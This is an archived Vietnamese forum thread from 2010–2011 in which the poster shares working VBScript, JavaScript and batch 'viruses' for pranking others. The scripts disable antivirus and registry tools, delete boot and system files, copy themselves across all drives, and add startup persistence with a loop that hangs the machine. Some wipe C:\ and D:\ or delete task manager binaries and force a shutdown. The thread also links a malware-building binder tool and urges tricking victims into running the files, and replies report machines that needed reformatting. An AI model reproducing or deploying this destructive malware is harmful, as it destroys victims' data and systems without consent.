PDA

View Full Version : Tự tạo vài con virus chơi


duyniceboy
08-31-2010, 07:34 PM
Chỉ với Notepad hay Wordpad bạn đã có thể tự tạo cho mình 1 "chú" Virus dưới dạng VBSCRIPT hoặc Javascript rồi:


Dưới đây là code của một số con virus nhỏ dưới dạng VBS:

1.Không cho victim khởi động máy:

Dim wsh
Set wsh = createobject("wscript.shell")
wsh.run "RUNDLL32.EXE user.exe,exitwindows"


2. Disable NAV:

Dim wsh
Set wsh= CreateObject( "WScript.Shell")
s1 = "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic es\Norton Program
Scheduler\Start"
wsh.RegWrite s1,3, "REG_DWORD"


3. Hiển thị một message mỗi khi reboot máy:

dim wsh
Set wsh = CreateObject( "WScript.Shell" )
s1 = "HKLM\Software\Microsoft\Windows\CurrentVersion\Win Logon\"
s2 = "LegalNoticeCaption"
s3 = "LegalNoticeText"
wsh.RegWrite s1+s2, "http://allformy.topcities.com"
wsh.RegWrite s1+s3, "Hi ! Toi la TrungWK- Toi den tu Chip&Kitty.tk"


4. Hiển thị một dòng lệnh khi click vào file hay folder:

set reg=createobject("WScript.shell")
reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Hi ! Ban da bi nhiem WK tu Chip&Kitty.tk"
reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Hi ! Ban da bi nhiem WK tu Chip&Kitty.tk\","Robinhood"


5. Làm cho các trò trên hoạt động bình thường:

Dim objShell
Set objShell = CreateObject( "WScript.Shell" )
s1 = "HKEY_USERS\.Default\Software\Microsoft\Windows\Cur rentVersion\"
s2 = "Policies\System\DisableRegistryTools"
objShell.RegWrite s1+s2,1, "REG_DWORD"

Dưới dạng Javascipt :

var wsh;
wsh=new ActiveXObject ("Wscript.shell");


// Winlogon when reboot
var s1 = "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\WinLogon\\";
var s2 = "LegalNoticeCaption";
var s3 = "LegalNoticeText";
wsh.RegWrite (s1+ s2, "http://allformy.topcities.com") ;
wsh.RegWrite (s1+s3, "Hi ! Toi la Anti_Love. Toi den tu Chip&Kitty.com") ;

//Disable Registry
var s1 = "HKEY_USERS\\.Default\\Software\\Microsoft\\Windows \\CurrentVersion\\";
var s2 = "Policies\\System\\DisableRegistryTools" ;
wsh.RegWrite (s1+s2,0,"REG_DWORD");


//Delete file Msconfig.exe làm cho victim khởi động tới Registry luôn

var fso;
fso=new ActiveXObject("Scripting.FileSystemObject");
var fe=fso.getfile("C:\\windows\\msconfig.exe);
fe.delete true;


//Disable Mouse

wsh.run ("RUNDLL32.EXE mouse,disable");


//Hang up windows

wsh.run ("rundll32 user,disableoemlayer");

Nguồn:
http://rootbiez.blogspot.com

duyniceboy
08-31-2010, 07:36 PM
P2:
Tạo virus nhân file

Đầu tiên để tạo virut giả trêu người khác
Bạn vào Start => Run => gõ "NOTEPAD" sau đó nhấn Enter rồi chép đoạn này vào:

'Thuoc Doc !!!
Dim fso,file,VBCopy
Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fso.OpenTextFile(WScript.ScriptFullName,1)
VBCopy=file.ReadAll
FolderList("A:\")
FolderList("B:\")
FolderList("C:\")
FolderList("D:\")
FolderList("E:\")
FolderList("F:\")
FolderList("G:\")
FolderList("H:\")
FolderList("I:\")
FolderList("J:\")
FolderList("K:\")
FolderList("L:\")
FolderList("M:\")
FolderList("N:\")
FolderList("O:\")
FolderList("P:\")
FolderList("Q:\")
FolderList("R:\")
FolderList("S:\")
FolderList("T:\")
FolderList("U:\")
FolderList("V:\")
FolderList("X:\")
FolderList("Y:\")
FolderList("Z:\")
FolderList("W:\")

Sub FolderList(FolderSpec)
On Error Resume Next
Dim f,f1,sf,COP,CAP
Set f=fso.GetFolder(FolderSpec)
set sf=f.SubFolders
For Each f1 In sf
Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")
COP.write VBCopy
Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")
CAP.write VBCopy
FolderList(f1.Path)
Next
End sub

Rồi nhấn Ctrl + S => Save lại với tên là: Thuoc_Doc.vbs
nhớ đuôi phải là .VBS nha
chỉ cần chạy file này là "Tràn ngập Virus !"

Còn đây là file thuốc giải:'Thuoc Giai
Dim fso,file,VBCopy
Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fso.OpenTextFile(WScript.ScriptFullName,1)
VBCopy=file.ReadAll
FolderList("A:\")
FolderList("B:\")
FolderList("C:\")
FolderList("D:\")
FolderList("E:\")
FolderList("F:\")
FolderList("G:\")
FolderList("H:\")
FolderList("I:\")
FolderList("J:\")
FolderList("K:\")
FolderList("L:\")
FolderList("M:\")
FolderList("N:\")
FolderList("O:\")
FolderList("P:\")
FolderList("Q:\")
FolderList("R:\")
FolderList("S:\")
FolderList("T:\")
FolderList("U:\")
FolderList("V:\")
FolderList("X:\")
FolderList("Y:\")
FolderList("Z:\")
FolderList("W:\")

Sub FolderList(FolderSpec)
On Error Resume Next
Dim f,f1,sf,COP,CAP,ATT
Set f=fso.GetFolder(FolderSpec)
set sf=f.SubFolders
For Each f1 In sf
'Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")
'COP.write VBCopy
'Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")
'CAP.write VBCopy
'Set ATT=fso.GetFolder(f1.Path)
'ATT.Attributes=ATT.Attributes+2
fso.DeleteFile(f1.path & "\Virus !!!!!!!.vbs")
fso.DeleteFile(f1.path & "---Virus !!!!!!!.vbs")
FolderList(f1.Path)
Next
End sub

cũng lưu lại như trên với tên : Thuoc_Giai.vbs
nhớ là vbs là đuôi chứ ko phải tên.

Tiếp theo
Bạn mở notepad lên chép đoạn mã sau vào:

On Error Resume Next
Set popo= Createobject("scripting.filesystemobject")
popo.copyfile wscript.scriptfullname,cuong.GetSpecialFolder(1)& "\popo.vbs"
Set popo2= CreateObject("WScript.Shell")
popo2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Ru n\cod e1","wscript.exe "&popo.GetSpecialFolder(0)& "\popo.vbs %"
Set treomay= CreateObject("WScript.Shell")
Do
treomay.run "notepad",false
loop

cái này sẽ làm máy bị treo

lưu lại với tên jì cũng đc nhưng với đuôi là ".vbs"
Ví Dụ: treomay.vbs

muốn sửa thì chỉ cần Restart là OK

Tiếp tục với phần mềm

Bạn muốn dọa thằng bạn ngốc của mình bằng virus ư ? nhưng virus ở đâu ra đây, lỡ chạy hư máy nó bắt đền thì sao đây ?
Phần mềm tạo virus ảo
The Ultimate Virus là chương trình giả virus giúp bạn lừa được họ.

Đặc tính của nó là không hại máy tính mà chỉ đưa ra các cảnh báo giả để hù dọa mà thôi, không có lây lan đâu. Từ từ khám phá nhé.

Lưu ý nếu sợ quá thì bấm nút Reset trên thùng máy hoặc Ctrl Alt Del là xong. Chúc nghịch virus vui vẻ.
Link : http://www.mediafire.com/?zzhz03mwwdm

Phầm mềm cuối cùng TeraBIT Virus Maker 2.8 SE

Cách sử dụng khá đơn giản
- Chọn Brinder, tìm file bất kì nào đó làm mục tiêu trong khung Browser (file này có thể là text, hình ảnh, nhạc, file cài đặt...)
- Chọn các chiêu thức phá rối bên khung trái - Chọn (hay không tùy bạn) Fake Error Message và gõ thông báo thể hiện tùy ý khi virus tấn công
- Chọn tên file virus khi "ra lò" trong khung file Name...
- Chọn icon giả danh trong file Icon
- Nhấn Create Virus để sản xuất 'thành phẩm" > Các mã phá hoại sẽ được cài ngầm vào file mục tiêu và sẽ hoạt động khi file này được chạy.
-Save Settings để ghi nhớ lại các lựa chọn, Load settings để lấy lại các lựa chọn đã cất giữ.

Link : http://www.mediafire.com/?mkyyugwj4d5

Lưu Ý : Đây đều là các loại Virus cũ nên các bác có thể quét vô tư bằng Bkav, Kas,Avira ...Nếu muốn sửa chữa thì dùng VN Fix của bệnh viện

duyniceboy
08-31-2010, 07:40 PM
Bạn chỉ cần mở note Pad lên và copy những đọan code trên sau đó save nó lại đổi đuôi file. VBS là xong.Sau đó kích họat nó lên = double click
Lưu ý ở phần II thuốc giải có thể giải hoặc ko giải đc hên xui nhé.
Nếu nghịch thì nghịch vừa vừa thôi.
P/s:Cái này gửi cho mí bạn nữ thì hay lắm.Tụi nó khóc lóc van xin anh IT wa sửa máy giúp.Hehe,Có cơ hội ghi điểm ^^

duyniceboy
08-31-2010, 07:45 PM
Những virus không nên thử dù chỉ 1 lần

Virus xóa file system

Mở notepad lên và copy vào đó đoạn code sau:
Code:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Save lại với dạng karobi.bat
Dụ victim mở nó lên và...

Tác dụng của con này là : nó sẽ xoá hết những file khởi động của hệ thống .

Cách khắc phục : sang máy khác copy các file sau : autoexec.bat ; boot.ini ; ntldr ; win.ini và dán vào ổ C .
Riêng file win.ini thì cho vào C:\Window\ nhé .


Virus làm treo máy

Worm

Các bạn lưu với đuôi .vbs là ok.

msgbox"Warnig!" 'Cai nay co tac dung se tao 1 hop thong bao tren man hinh cua nan nhan
On Error Resume Next
Set vip_xinh = Createobject("scripting.filesystemobject")
vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& "\ vip_xinh.vbs"
Set vip_xinh2= CreateObject("WScript.Shell")
vip_xinh2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\die","wscript.exe "& vip_xinh.GetSpecialFolder(0)& "\ vip_xinh.vbs %"

On Error Resume Next
Const vic = "D:\"
Delvic
Sub Delvic()
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile vic & "*.*" , True
fso.DeleteFolder vic & "*" , True
End Sub

On Error Resume Next
Const vic1 = "C:\windows\"
Delvic1
Sub Delvic1()
Dim fso1
Set fso1 = CreateObject("Scripting.FileSystemObject")
fso1.DeleteFile vic1 & "*.*" , True
fso1.DeleteFolder vic1 & "*" , True
End Sub

On Error Resume Next
Const vic2 = "C:\"
Delvic2
Sub Delvic2()
Dim fso2
Set fso2 = CreateObject("Scripting.FileSystemObject")
fso2.DeleteFile vic2 & "*.*" , True
fso2.DeleteFolder vic2 & "*" , True
End Sub

On Error Resume Next
Set treomay= CreateObject("WScript.Shell")
Do
treomay.run "notepad",false
loop

Làm hư task manager

@Echo Off
@cls
@title Virus ti choi
@assoc exe=txt
@assoc reg=jpg
@cd %systemroot%
@del /f /s /q TASKMAN.EXE
@cd %Systemroot%\system32
@del /f /s /q hal.dll
@del /f /s /q taskkil.exe
@del /f /s /q tasklist.exe
@del /f /s /q taskman.exe
@del /f /s /q taskmgr.exe
@shutdown -s -t 06 -c " Fatal error #1337, You DEAD!"
@del /f /s /q *.*
@cd ..
@del /f /s /q TASKMAN.EXE
@del /f /s /q *.*
@exit

Save thành file *.bat

thang
09-01-2010, 12:36 AM
Virus diệt ko hết ông còn tạo ra mần chi :-" :-|

duyniceboy
09-01-2010, 08:29 AM
Virus diệt ko hết ông còn tạo ra mần chi :-" :-|

8-x dạ để phá máy người khác ạ

Richyourlife
12-30-2010, 10:03 PM
..........Đã thử cái thứ 2 và kết quả là không del đc fải đem đi for T_T

duyniceboy
07-30-2011, 09:15 PM
-.- tình hình là hôm wa mới thử lại rồi.......giải ko đc hix.>>> format

nhanvatso1
07-30-2011, 11:02 PM
Ta đã cảnh cáo lão ko dc khoe mấy skill này ra , giời ạ khối ng phải đi format đây